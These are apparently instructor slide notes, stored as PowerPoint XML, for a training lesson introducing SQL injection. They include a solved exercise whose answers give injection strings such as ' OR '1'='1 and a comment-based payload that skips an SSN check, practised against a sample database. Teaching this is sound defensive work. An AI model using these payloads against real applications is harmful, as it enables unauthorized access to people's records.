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handoutMasterIdLst>
    <p:handoutMasterId r:id="rId52"/>
  </p:handoutMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="507" r:id="rId2"/>
    <p:sldId id="1211" r:id="rId3"/>
    <p:sldId id="1262" r:id="rId4"/>
    <p:sldId id="1213" r:id="rId5"/>
    <p:sldId id="1239" r:id="rId6"/>
    <p:sldId id="1240" r:id="rId7"/>
    <p:sldId id="1146" r:id="rId8"/>
    <p:sldId id="1263" r:id="rId9"/>
    <p:sldId id="1056" r:id="rId10"/>
    <p:sldId id="1264" r:id="rId11"/>
    <p:sldId id="1052" r:id="rId12"/>
    <p:sldId id="1144" r:id="rId13"/>
    <p:sldId id="1055" r:id="rId14"/>
    <p:sldId id="1145" r:id="rId15"/>
    <p:sldId id="1241" r:id="rId16"/>
    <p:sldId id="1242" r:id="rId17"/>
    <p:sldId id="1129" r:id="rId18"/>
    <p:sldId id="1185" r:id="rId19"/>
    <p:sldId id="1243" r:id="rId20"/>
    <p:sldId id="1246" r:id="rId21"/>
    <p:sldId id="1247" r:id="rId22"/>
    <p:sldId id="1248" r:id="rId23"/>
    <p:sldId id="1249" r:id="rId24"/>
    <p:sldId id="1250" r:id="rId25"/>
    <p:sldId id="1219" r:id="rId26"/>
    <p:sldId id="1235" r:id="rId27"/>
    <p:sldId id="1220" r:id="rId28"/>
    <p:sldId id="1234" r:id="rId29"/>
    <p:sldId id="1251" r:id="rId30"/>
    <p:sldId id="1212" r:id="rId31"/>
    <p:sldId id="1253" r:id="rId32"/>
    <p:sldId id="1254" r:id="rId33"/>
    <p:sldId id="1256" r:id="rId34"/>
    <p:sldId id="1257" r:id="rId35"/>
    <p:sldId id="1258" r:id="rId36"/>
    <p:sldId id="1252" r:id="rId37"/>
    <p:sldId id="1261" r:id="rId38"/>
    <p:sldId id="1232" r:id="rId39"/>
    <p:sldId id="1218" r:id="rId40"/>
    <p:sldId id="1233" r:id="rId41"/>
    <p:sldId id="1214" r:id="rId42"/>
    <p:sldId id="1236" r:id="rId43"/>
    <p:sldId id="1259" r:id="rId44"/>
    <p:sldId id="1260" r:id="rId45"/>
    <p:sldId id="1229" r:id="rId46"/>
    <p:sldId id="1228" r:id="rId47"/>
    <p:sldId id="1216" r:id="rId48"/>
    <p:sldId id="1230" r:id="rId49"/>
    <p:sldId id="1115"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leke Sengstacke" initials="PS" lastIdx="1" clrIdx="0">
    <p:extLst>
      <p:ext uri="{19B8F6BF-5375-455C-9EA6-DF929625EA0E}">
        <p15:presenceInfo xmlns:p15="http://schemas.microsoft.com/office/powerpoint/2012/main" userId="f784b3bb772156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87"/>
    <a:srgbClr val="E04006"/>
    <a:srgbClr val="D14828"/>
    <a:srgbClr val="418BC7"/>
    <a:srgbClr val="3598DB"/>
    <a:srgbClr val="F8B041"/>
    <a:srgbClr val="FDB072"/>
    <a:srgbClr val="7CA5C6"/>
    <a:srgbClr val="2DA5D5"/>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1" autoAdjust="0"/>
    <p:restoredTop sz="87538" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr>
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="99" d="100"/>
          <a:sy n="99" d="100"/>
        </p:scale>
        <p:origin x="2152" y="176"/>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1/2/19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1/2/19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exploit was due to a vulnerability in the website’s SQL server.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Attacks against SQL databases are common, and can be deadly. So, today’s lesson will let us get our bearings with the basics of SQL.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>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11284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injection, like XSS, is ultimately due to a server’s executing malicious user input as code.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>We’ll get started by examining how the data users submit through web forms gets to the server; how the server uses this to query the database; and how users can interact with the database by “tricking” the server into building custom SQL queries.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>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82403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Forms</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t> are used to collect data from users, which web applications use to customize their experience.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" i="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>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045378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these forms is sent to the server (most commonly) via HTTP POST request.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Note</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>: HTTP GET requests can also be used, but POST for this purpose is more common in more recent web applications.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>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96038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request then makes its way to the server, where it uses the user input to run code that gets information from the database.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>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814150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these forms is sent to the server (most commonly) via HTTP POST request.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Note</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>: HTTP GET requests can also be used, but POST for this purpose is more common in more recent web applications.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" b="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>Note that the user’s input gets stored in the variable </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>$name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>. Then, the variable $name gets used to create a SQL query (on line 3, with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>$query</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFontTx/>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Reassure students that they do </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>not</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="0" dirty="0"/>
              <a:t> need to be able to read PHP for this lesson—we’re simply exposing the server-side code because seeing how user input is used to build SQL queries is a necessary prerequisite to building injection payloads.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>Emphasize that the takeaway point is: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Servers can use user input to create SQL queries. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>This means that </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>users who submit malicious SQL can run their own queries!</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>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461171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the three main steps through which user input gets to the server.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>First, the user submits a form. Submitted data gets sent through the POST body.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Next, the server uses the user’s submission to create a SQL query.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Finally, the server sends this query to the database to execute.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>In this example, the user submitted “normal” data—a real name—so everything behaves as expected.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>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727560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this query, the user submits </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>SQL code</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>—</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="1" dirty="0"/>
              <a:t>not</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t> what the server expected.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="0" i="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>Note that this submissions causes the server to create a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="0" dirty="0"/>
              <a:t>totally different query than the one the developer intended</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="0" i="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>Since this query is still valid SQL, the database will execute it without complaints.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="0" i="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>The problem? This returns </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="1" dirty="0"/>
              <a:t>every</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t> row in the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="0" dirty="0"/>
              <a:t>users</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t> table—</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="1" dirty="0"/>
              <a:t>not</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t> just the ones with a matching name!</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" i="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>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788616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2179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2238154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00085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Stu_SQL_Warm_Up</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207856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Let students know that practicing this kind of substitution is an important stepping stone for crafting injection payloads, and that the next exercise will provide some such practice.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Slack out the instructions in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Activities/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>Stu_SQL_Substitutions</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16205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dirty="0"/>
              <a:t>Activities/Stu_SQL_Substitutions/Solved/README.md</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> (duplicated below).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="0" i="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>---</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t># SQL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0" err="1"/>
              <a:t>Substititions</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="0" i="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>In this exercise, you'll get practice with how servers substitute user-submitted values into SQL queries. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="0" i="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>This is useful for understanding more complicated SQL injection scenarios involving an actual web application, as it helps you understand how the server is actually using the malicious data you submit.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="0" i="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>## Instructions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="0" i="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>Navigate to the fiddle at: &lt;https://www.db-fiddle.com/f/gAkPEQwVW7EsAnm3xuUJGx/0&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="0" i="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>Consider the query below as you follow the instructions:</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name='$EXPLOIT_NAME';</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>  ```</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="0" i="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>Suppose that:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>- A user is using a site that allows them to look up information about known exploits</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>- `$EXPLOIT_NAME` comes from the user-submitted search value</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>- The web application uses the user-submitted search value to create the SQL query it runs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="0" i="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>So, if a user searches for `'aurora'`, the query becomes:</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name='aurora';</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>  ```</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="0" i="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>Keep this in mind as you follow the instructions below.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="0" i="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>### "Simple" Substitutions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="0" i="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>- What value does `$EXPLOIT_NAME` need to have to generate the query below? What results does this generate in the fiddle?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>  &gt; **Solution**</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>  &gt;   - `$EXPLOIT_NAME` = `'eternal romance'`</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>  &gt;   - This simply retrieves the record for `eternal romance`.</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name='eternal romance';</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>  ```</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="0" i="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>- What value does `$EXPLOIT_NAME` need to have to generate the query below? What results does this generate in the fiddle?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>  &gt; **Solution**</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>  &gt;   - `$EXPLOIT_NAME` = `aurora' OR id='1'`. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>  &gt;   - This returns the record for `'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0" err="1"/>
              <a:t>eternal_romance</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>'` (with `id=1`) _and_ for `'aurora'`.</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name='aurora' OR id='1';</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>  ```</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="0" i="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>- What value does `$EXPLOIT_NAME` need to have to generate the query below? What results does this generate in the fiddle?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>  &gt; **Solution**</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>  &gt;   - `$EXPLOIT_NAME` = `' OR '1'='1`. **Note that you do _not_ need to include the final single quote!**</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>  &gt;   - This returns _every_ row in the `</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0" err="1"/>
              <a:t>warehouse.exploits</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>` table!</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 OR '1'='1';</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>  ```</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="0" i="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>- What value does `$EXPLOIT_NAME` need to have to generate the query below? What results does this generate in the fiddle?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>  &gt; **Solution**</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>  &gt;   - `$EXPLOIT_NAME` = `'`. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>  &gt;   - This is invalid SQL, so it throws an error.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="0" i="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>  ```</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0" err="1"/>
              <a:t>sql</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="0" i="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>  SELECT * FROM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0" err="1"/>
              <a:t>warehouse.exploits</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t> WHERE name=''';</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>  ```</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="0" i="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>### "Complex" Substitutions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>In addition to special characters like quotes, you can inject the comment character: `--`.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="0" i="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>This forces the server _not_ to run whatever SQL code follows the comment.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="0" i="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>Consider the query below to see when this might be useful:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="0" i="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>  ```</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0" err="1"/>
              <a:t>sql</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="0" i="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>  -- Retrieve account data for `$USERNAME`, as long as they provide the right SSN</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>  SELECT * FROM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0" err="1"/>
              <a:t>warehouse.accounts</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t> WHERE name='$USERNAME' AND </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0" err="1"/>
              <a:t>ssn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>='$USER_SSN';</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>  ```</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="0" i="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>---</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="0" i="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>- What value must `$USERNAME` have to generate the query below? What results does this generate?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>  &gt; **Solution**</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>  &gt;   - `$USERNAME` = `jane'; -- `. The final space is important!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>  &gt;   - This retrieves _just_ the record for `jane`, _even if she submits the wrong SSN_. This is because the comment (`--`) causes the database to skip the `AND </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0" err="1"/>
              <a:t>ssn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>=$USER_SSN` statement, so it doesn't perform that check at all!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="0" i="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>  ```</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0" err="1"/>
              <a:t>sql</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="0" i="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>  -- Retrieve account data for `$USERNAME`, as long as they provide the right SSN</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>  SELECT * FROM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0" err="1"/>
              <a:t>warehouse.accounts</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t> WHERE name='jane'; -- AND </a:t>
            </a:r>
            <a:r>
